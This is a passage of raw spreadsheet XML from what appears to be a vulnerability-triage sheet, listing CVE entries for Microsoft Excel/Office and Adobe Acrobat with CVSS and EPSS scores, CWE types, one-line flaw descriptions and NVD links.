s="5" t="n"><v>7.8</v></c><c r="E986" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F986" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G986" s="5" t="inlineStr" /><c r="H986" s="5" t="n"><v>0.004</v></c><c r="I986" s="5" t="inlineStr" /><c r="J986" s="5" t="inlineStr" /><c r="K986" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L986" s="5" t="inlineStr" /><c r="M986" s="5" t="inlineStr" /><c r="N986" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O986" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P986" s="5" t="inlineStr" /><c r="Q986" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R986" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t></is></c><c r="S986" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81948</t></is></c></row><row r="987"><c r="A987" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B987" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C987" s="5" t="inlineStr"><is><t>CVE-2026-81949</t></is></c><c r="D987" s="5" t="n"><v>7.8</v></c><c r="E987" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F987" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G987" s="5" t="inlineStr" /><c r="H987" s="5" t="n"><v>0.004</v></c><c r="I987" s="5" t="inlineStr" /><c r="J987" s="5" t="inlineStr" /><c r="K987" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L987" s="5" t="inlineStr" /><c r="M987" s="5" t="inlineStr" /><c r="N987" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O987" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P987" s="5" t="inlineStr" /><c r="Q987" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="R987" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t></is></c><c r="S987" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81949</t></is></c></row><row r="988"><c r="A988" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B988" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C988" s="5" t="inlineStr"><is><t>CVE-2026-81950</t></is></c><c r="D988" s="5" t="n"><v>7.8</v></c><c r="E988" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F988" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G988" s="5" t="inlineStr" /><c r="H988" s="5" t="n"><v>0.004</v></c><c r="I988" s="5" t="inlineStr" /><c r="J988" s="5" t="inlineStr" /><c r="K988" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L988" s="5" t="inlineStr" /><c r="M988" s="5" t="inlineStr" /><c r="N988" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O988" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P988" s="5" t="inlineStr" /><c r="Q988" s="5" t="inlineStr"><is><t>CWE-415</t></is></c><c r="R988" s="5" t="inlineStr"><is><t>Double free in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t></is></c><c r="S988" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81950</t></is></c></row><row r="989"><c r="A989" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B989" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C989" s="5" t="inlineStr"><is><t>CVE-2026-81951</t></is></c><c r="D989" s="5" t="n"><v>7.8</v></c><c r="E989" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F989" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G989" s="5" t="inlineStr" /><c r="H989" s="5" t="n"><v>0.004</v></c><c r="I989" s="5" t="inlineStr" /><c r="J989" s="5" t="inlineStr" /><c r="K989" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L989" s="5" t="inlineStr" /><c r="M989" s="5" t="inlineStr" /><c r="N989" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O989" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P989" s="5" t="inlineStr" /><c r="Q989" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R989" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t></is></c><c r="S989" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81951</t></is></c></row><row r="990"><c r="A990" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B990" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C990" s="5" t="inlineStr"><is><t>CVE-2026-81953</t></is></c><c r="D990" s="5" t="n"><v>7.8</v></c><c r="E990" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F990" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G990" s="5" t="inlineStr" /><c r="H990" s="5" t="n"><v>0.004</v></c><c r="I990" s="5" t="inlineStr" /><c r="J990" s="5" t="inlineStr" /><c r="K990" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L990" s="5" t="inlineStr" /><c r="M990" s="5" t="inlineStr" /><c r="N990" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O990" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P990" s="5" t="inlineStr" /><c r="Q990" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="R990" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t></is></c><c r="S990" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81953</t></is></c></row><row r="991"><c r="A991" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B991" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C991" s="5" t="inlineStr"><is><t>CVE-2026-81954</t></is></c><c r="D991" s="5" t="n"><v>7.8</v></c><c r="E991" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F991" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G991" s="5" t="inlineStr" /><c r="H991" s="5" t="n"><v>0.003</v></c><c r="I991" s="5" t="inlineStr" /><c r="J991" s="5" t="inlineStr" /><c r="K991" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L991" s="5" t="inlineStr" /><c r="M991" s="5" t="inlineStr" /><c r="N991" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O991" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P991" s="5" t="inlineStr" /><c r="Q991" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R991" s="5" t="inlineStr"><is><t>Use after free in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t></is></c><c r="S991" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81954</t></is></c></row><row r="992"><c r="A992" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B992" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C992" s="5" t="inlineStr"><is><t>CVE-2026-81956</t></is></c><c r="D992" s="5" t="n"><v>7.8</v></c><c r="E992" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F992" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G992" s="5" t="inlineStr" /><c r="H992" s="5" t="n"><v>0.004</v></c><c r="I992" s="5" t="inlineStr" /><c r="J992" s="5" t="inlineStr" /><c r="K992" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:office_online_server</t></is></c><c r="L992" s="5" t="inlineStr" /><c r="M992" s="5" t="inlineStr" /><c r="N992" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O992" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P992" s="5" t="inlineStr" /><c r="Q992" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R992" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t></is></c><c r="S992" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81956</t></is></c></row><row r="993"><c r="A993" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B993" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C993" s="5" t="inlineStr"><is><t>CVE-2026-81957</t></is></c><c r="D993" s="5" t="n"><v>7.8</v></c><c r="E993" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F993" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G993" s="5" t="inlineStr" /><c r="H993" s="5" t="n"><v>0.004</v></c><c r="I993" s="5" t="inlineStr" /><c r="J993" s="5" t="inlineStr" /><c r="K993" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L993" s="5" t="inlineStr" /><c r="M993" s="5" t="inlineStr" /><c r="N993" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O993" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P993" s="5" t="inlineStr" /><c r="Q993" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R993" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t></is></c><c r="S993" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81957</t></is></c></row><row r="994"><c r="A994" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B994" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C994" s="5" t="inlineStr"><is><t>CVE-2026-81959</t></is></c><c r="D994" s="5" t="n"><v>7.8</v></c><c r="E994" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F994" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G994" s="5" t="inlineStr" /><c r="H994" s="5" t="n"><v>0.004</v></c><c r="I994" s="5" t="inlineStr" /><c r="J994" s="5" t="inlineStr" /><c r="K994" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L994" s="5" t="inlineStr" /><c r="M994" s="5" t="inlineStr" /><c r="N994" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O994" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P994" s="5" t="inlineStr" /><c r="Q994" s="5" t="inlineStr"><is><t>CWE-122, CWE-190</t></is></c><c r="R994" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t></is></c><c r="S994" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81959</t></is></c></row><row r="995"><c r="A995" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B995" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C995" s="5" t="inlineStr"><is><t>CVE-2026-81960</t></is></c><c r="D995" s="5" t="n"><v>7.8</v></c><c r="E995" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F995" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G995" s="5" t="inlineStr" /><c r="H995" s="5" t="n"><v>0.004</v></c><c r="I995" s="5" t="inlineStr" /><c r="J995" s="5" t="inlineStr" /><c r="K995" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L995" s="5" t="inlineStr" /><c r="M995" s="5" t="inlineStr" /><c r="N995" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O995" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P995" s="5" t="inlineStr" /><c r="Q995" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R995" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t></is></c><c r="S995" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81960</t></is></c></row><row r="996"><c r="A996" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B996" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C996" s="5" t="inlineStr"><is><t>CVE-2026-81973</t></is></c><c r="D996" s="5" t="n"><v>7.8</v></c><c r="E996" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F996" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G996" s="5" t="inlineStr" /><c r="H996" s="5" t="n"><v>0.002</v></c><c r="I996" s="5" t="inlineStr" /><c r="J996" s="5" t="inlineStr" /><c r="K996" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L996" s="5" t="inlineStr" /><c r="M996" s="5" t="inlineStr" /><c r="N996" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O996" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P996" s="5" t="inlineStr" /><c r="Q996" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R996" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="S996" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81973</t></is></c></row><row r="997"><c r="A997" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B997" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C997" s="5" t="inlineStr"><is><t>CVE-2026-81975</t></is></c><c r="D997" s="5" t="n"><v>7.8</v></c><c r="E997" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F997" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G997" s="5" t="inlineStr" /><c r="H997" s="5" t="n"><v>0.002</v></c><c r="I997" s="5" t="inlineStr" /><c r="J997" s="5" t="inlineStr" /><c r="K997" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L997" s="5" t="inlineStr" /><c r="M997" s="5" t="inlineStr" /><c r="N997" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O997" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P997" s="5" t="inlineStr" /><c r="Q997" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R997" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="S997" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81975</t></is></c></row><row r="998"><c r="A998" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B998" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C998" s="5" t="inlineStr"><is><t>CVE-2026-81976</t></is></c><c r="D998" s="5" t="n"><v>7.8</v></c><c r="E998" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F998" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G998" s="5" t="inlineStr" /><c r="H998" s="5" t="n"><v>0.002</v></c><c r="I998" s="5" t="inlineStr" /><c r="J998" s="5" t="inlineStr" /><c r="K998" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L998" s="5" t="inlineStr" /><c r="M998" s="5" t="inlineStr" /><c r="N998" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O998" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P998" s="5" t="inlineStr" /><c r="Q998" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R998" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="S998" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81976</t></is></c></row><row r="999"><c r="A999" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B999" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C999" s="5" t="inlineStr"><is><t>CVE-2026-81979</t></is></c><c r="D999" s="5" t="n"><v>7.8</v></c><c r="E999" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F999" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G999" s="5" t="inlineStr" /><c r="H999" s="5" t="n"><v>0.002</v></c><c r="I999" s="5" t="inlineStr" /><c r="J999" s="5" t="inlineStr" /><c r="K999" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L999" s="5" t="inlineStr" /><c r="M999" s="5" t="inlineStr" /><c r="N999" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O999" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P999" s="5" t="inlineStr" /><c r="Q999" s="5" t="inlineStr"><is><t>CWE-787</t></is></c><c r="R999" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="S999" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81979</t></is></c></row><row r="1000"><c r="A1000" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1000" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1000" s="5" t="inlineStr"><is><t>CVE-2026-81980</t></is></c><c r="D1000" s="5" t="n"><v>7.8</v></c><c r="E1000" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1000" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1000" s="5" t="inlineStr" /><c r="H1000" s="5" t="n"><v>0.002</v></c><c r="I1000" s="5" t="inlineStr" /><c r="J1000" s="5" t="inlineStr" /><c r="K1000" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L1000" s="5" t="inlineStr" /><c r="M1000" s="5" t="inlineStr" /><c r="N1000" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1000" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1000" s="5" t="inlineStr" /><c r="Q1000" s="5" t="inlineStr"><is><t>CWE-787</t></is></c><c r="R1000" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="S1000" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81980</t></is></c></row><row r="1001"><c r="A1001" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1001" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1001" s="5" t="inlineStr"><is><t>CVE-2026-81981</t></is></c><c r="D1001" s="5" t="n"><v>7.8</v></c><c r="E1001" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1001" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1001" s="5" t="inlineStr" /><c r="H1001" s="5" t="n"><v>0.002</v></c><c r="I1001" s="5" t="inlineStr" /><c r="J1001" s="5" t="inlineStr" /><c r="K1001" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L1001" s="5" t="inlineStr" /><c r="M1001" s="5" t="inlineStr" /><c r="N1001" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1001" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1001" s="5" t="inlineStr" /><c r="Q1001" s="5" t="inlineStr"><is><t>CWE-787</t></is></c><c r="R1001" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="S1001" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81981</t></is></c></row><row r="1002"><c r="A1002" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1002" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1002" s="5" t="inlineStr"><is><t>CVE-2026-81983</t></is></c><c r="D1002" s="5" t="n"><v>7.8</v></c><c r="E1002" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1002" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1002" s="5" t="inlineStr" /><c r="H1002" s="5" t="n"><v>0.002</v></c><c r="I1002" s="5" t="inlineStr" /><c r="J1002" s="5" t="inlineStr" /><c r="K1002" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L1002" s="5" t="inlineStr" /><c r="M1002" s="5" t="inlineStr" /><c r="N1002" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1002" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1002" s="5" t="inlineStr" /><c r="Q1002" s="5" t="inlineStr"><is><t>CWE-787</t></is></c><c r="R1002" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="S1002" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81983</t></is></c></row><row r="1003"><c r="A1003" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1003" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1003" s="5" t="inlineStr"><is><t>CVE-2026-81985</t></is></c><c r="D1003" s="5" t="n"><v>7.8</v></c><c r="E1003" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1003" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1003" s="5" t="inlineStr" /><c r="H1003" s="5" t="n"><v>0.002</v></c><c r="I1003" s="5" t="inlineStr" /><c r="J1003" s="5" t="inlineStr" /><c r="K1003" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L1003" s="5" t="inlineStr" /><c r="M1003" s="5" t="inlineStr" /><c r="N1003" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1003" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1003" s="5" t="inlineStr" /><c r="Q1003" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1003" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="S1003" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81985</t></is></c></row><row r="1004"><c r="A1004" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1004" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1004" s="5" t="inlineStr"><is><t>CVE-2026-81986</t></is></c><c r="D1004" s="5" t="n"><v>7.8</v></c><c r="E1004" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1004" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1004" s="5" t="inlineStr" /><c r="H1004" s="5" t="n"><v>0.002</v></c><c r="I1004" s="5" t="inlineStr" /><c r="J1004" s="5" t="inlineStr" /><c r="K1004" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L1004" s="5" t="inlineStr" /><c r="M1004" s="5" t="inlineStr" /><c r="N1004" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1004" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1004" s="5" t="inlineStr" /><c r="Q1004" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1004" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="S1004" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81986</t></is></c></row><row r="1005"><c r="A1005" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1005" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1005" s="5" t="inlineStr"><is><t>CVE-2026-81987</t></is></c><c r="D1005" s="5" t="n"><v>7.8</v></c><c r="E1005" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1005" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1005" s="5" t="inlineStr" /><c r="H1005" s="5" t="n"><v>0.002</v></c><c r="I1005" s="5" t="inlineStr" /><c r="J1005" s="5" t="inlineStr" /><c r="K1005" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L1005" s="5" t="inlineStr" /><c r="M1005" s="5" t="inlineStr" /><c r="N1005" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1005" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1005" s="5" t="inlineStr" /><c r="Q1005" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="R1005" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by an Integer Overflow or Wraparound vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="S1005" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81987</t></is></c></row><row r="1006"><c r="A1006" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1006" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1006" s="5" t="inlineStr"><is><t>CVE-2026-81988</t></is></c><c r="D1006" s="5" t="n"><v>7.8</v></c><c r="E1006" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1006" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1006" s="5" t="inlineStr" /><c r="H1006" s="5" t="n"><v>0.002</v></c><c r="I1006" s="5" t="inlineStr" /><c r="J1006" s="5" t="inlineStr" /><c r="K1006" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L1006" s="5" t="inlineStr" /><c r="M1006" s="5" t="inlineStr" /><c r="N1006" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1006" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1006" s="5" t="inlineStr" /><c r="Q1006" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1006" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="S1006" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81988</t></is></c></row><row r="1007"><c r="A1007" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1007" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1007" s="5" t="inlineStr"><is><t>CVE-2026-81989</t></is></c><c r="D1007" s="5" t="n"><v>7.8</v></c><c r="E1007" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1007" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1007" s="5" t="inlineStr" /><c r="H1007" s="5" t="n"><v>0.002</v></c><c r="I1007" s="5" t="inlineStr" /><c r="J1007" s="5" t="inlineStr" /><c r="K1007" s="5" t="inlineStr"><is><t>adobe:acrobat, 